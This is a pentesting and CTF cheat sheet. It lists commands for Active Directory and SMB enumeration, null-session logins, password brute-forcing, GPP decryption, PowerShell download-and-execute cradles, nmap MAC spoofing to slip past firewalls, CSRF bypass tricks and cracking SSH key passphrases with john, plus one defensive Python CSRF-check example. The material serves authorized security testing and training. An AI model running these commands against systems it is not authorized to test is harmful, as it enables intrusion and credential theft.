This cheat sheet will be updated regularly.

Pentesting/CTF Cheat Sheet



evil-winrm -> The ultimate WinRM shell for hacking/pentesting
empire -> Empire is a PowerShell and Python post-exploitation agent.
watson -> Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.
nishang -> Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
bloodhound -> BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to identify quickly.


# if you find a group policy preferences file, you can decrypt it with 'gpp-decrypt'; this is the old way Windows stored group policy
# if there isn't any account lockout threshold you can brute-force users.
# the OS version can be inferred if the build number reported by DNS is known: a version ending in x.x.7601 is Windows Server 2008; a build number bigger than 9000 is Windows 2016
# windows ttl is 128 by default

Active Directory

# using crackmapexec to dump the Password Policy
crackmapexec smb --pass-pol <ip>

# logging in with crackmapexec; the username (and password) field can take a txt file for brute-forcing
crackmapexec smb <ip> -u <username> -p '<password>'

# same login as above over winrm instead of smb
crackmapexec winrm <ip> -u <username> -p '<password>'

# executing commands with winrm module
crackmapexec winrm <ip> -u <username> -p '<password>' -x "whoami"

# rpcclient
rpcclient <ip>

# rpc anonymous (null session) login
rpcclient -U '' -N <ip>

# info about active directory accounts
rpcclient $> querydispinfo


# using ldapsearch simple auth to extract info out of active directory
ldapsearch -h <ip> -x

# ldap search querying base scope
ldapsearch -h <ip> -x -s base namingcontexts

# ldapsearch query persons within given base
ldapsearch -h <ip> -x -b "DC=cascade,DC=local" '(objectClass=Person)' > ldap_person_query.out


# msf has many modules for smb
search smb

# run safe scripts for port 445
nmap --script safe -p 445 <ip>

# list shares anonymous login
smbclient -L //<ip>

# enumerate smb
enum4linux <ip>

# enumerate smb file shares
smbmap -H <ip>

# list contents of <share_name>
smbmap -R <share_name> -H <ip>

# download a file from smb (connect to the share, then use get)
smbclient //<ip>/<share_name>
smb: \> get <filename>

# query target domain for user data -all -dc-ip <dc_ip> <hostname>/<username>

# if the user has admin privileges on the box, they can execute commands with: psexec <hostname>/<username>@<ip>

# null authentication
smbclient -U '' -N -L //<ip>


# download and run a script from <url> in memory (PowerShell)
IEX(New-Object Net.WebClient).downloadString('<url>')

# same thing from a cmd shell, piping the command into powershell
echo IEX(New-Object Net.WebClient).downloadString('<url>') | powershell -noprofile -

Privilege Escalation

# network configuration from PowerShell: Get-NetIPConfiguration or Get-NetIPAddress
# Empire has recon scripts
# Sherlock and Watson (its updated version) scan for kernel exploits


# learning the hostname (reverse lookup from the nslookup interactive prompt)
> server <ip>
> <ip>

# enumeration: reverse lookup of an ip range (-r takes a range, not a single ip)
dnsrecon -r <ip_range>

# zone transfer without domain
dig axfr @<DNS_IP>
# with domain
dig axfr @<DNS_IP> <DOMAIN> 



# enumerate software version with
# linux ttl is 64 by default

# better shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo
export TERM=xterm

# print the ip address of eth0
ip addr show eth0 | grep inet | awk '{ print $2; }' | sed 's/\/.*$//'

Privilege Escalation

# listing sudo privileges
sudo -l
cat /etc/sudoers

# distro version information
cat /etc/lsb-release


# -d can be used to debug failed scripts

# firewall bypass by changing your MAC to something legit (vendor name, prefix or full MAC)
nmap --spoof-mac IBM <ip>


# list all of the nmap scripts
locate -r '\.nse$' | xargs grep categories

# list all of the nmap scripts with certain categories
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb


Csrf Tips

Some applications correctly validate the token when the request uses the POST method but skip the validation when the GET method is used.
In this situation, the attacker can switch to the GET method to bypass the validation and deliver a CSRF attack.

In some cases the application won't mind if you remove the csrf parameter completely.

In some cases the csrf token isn't tied to the user account; instead tokens are handed out from a pool, so an attacker can log in to the app,
get a valid csrf token and attack the user with it.
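All three tips above are failures of the server-side check, so here is an added example (not from the original cheat sheet) of a minimal token check that closes each of them, beside the weak version that does not; the request and session shapes (plain dicts) are assumed and belong to no particular framework.

```python
import hmac
import secrets

# Methods that are allowed to change server state; GET never is.
STATE_CHANGING_METHODS = {"POST", "PUT", "PATCH", "DELETE"}

def issue_token(session):
    """Bind a fresh random token to this user's session (not a shared pool)."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token

def weak_gate(request, session, pool):
    """Vulnerable variant showing the three weaknesses from the tips above.
    Returns True when the state-changing action would be performed."""
    if request["method"] == "GET":
        return True                        # 1. GET skips validation entirely
    token = request["params"].get("csrf")
    if token is None:
        return True                        # 2. removing the parameter skips it
    return token in pool                   # 3. any pooled token is accepted

def strong_gate(request, session):
    """Hardened variant: refuse GET for state changes, require the token,
    and compare it (constant-time) with the one bound to this session."""
    if request["method"] not in STATE_CHANGING_METHODS:
        return False
    expected = session.get("csrf_token")
    supplied = request["params"].get("csrf")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)

def demo():
    """Run the three bypasses against both gates; returns (weak, strong) results."""
    victim, attacker, pool = {}, {}, set()      # constructed sessions and token pool
    pool.add(issue_token(victim))
    pool.add(issue_token(attacker))
    probes = [
        {"method": "GET", "params": {}},                                 # method switch
        {"method": "POST", "params": {}},                                # token removed
        {"method": "POST", "params": {"csrf": attacker["csrf_token"]}},  # pooled token
    ]
    weak = [weak_gate(p, victim, pool) for p in probes]
    strong = [strong_gate(p, victim) for p in probes]
    return weak, strong

if __name__ == "__main__":
    print(demo())  # ([True, True, True], [False, False, False])
```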

Information Disclosure

Trigger errors.
Look for developer comments.
Look for debugging data.
Accessing other accounts' information via a logic bug.
Source code disclosure via backup files: edited files may have a tilde (~) in the filename,
example: /lib/template.php~ can return source code.
The HTTP TRACE method is designed for diagnostic purposes. If enabled, the web server responds to TRACE requests by echoing back the exact request it received. This behavior is often harmless, but occasionally leads to information disclosure.

General Tips

# if you see drupal check /CHANGELOG.txt to enumerate the version
# always check robots.txt


# CMS Enum

# vuln scan


steghide extract -sf <filename>

# display info about a file whether it has embedded data or not.
steghide info <filename>

Hash Cracking

# crack a file
john --wordlist=<wordlist> <filename>

# crack the passphrase of an ssh private key
python ssh2john id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=rockyou.txt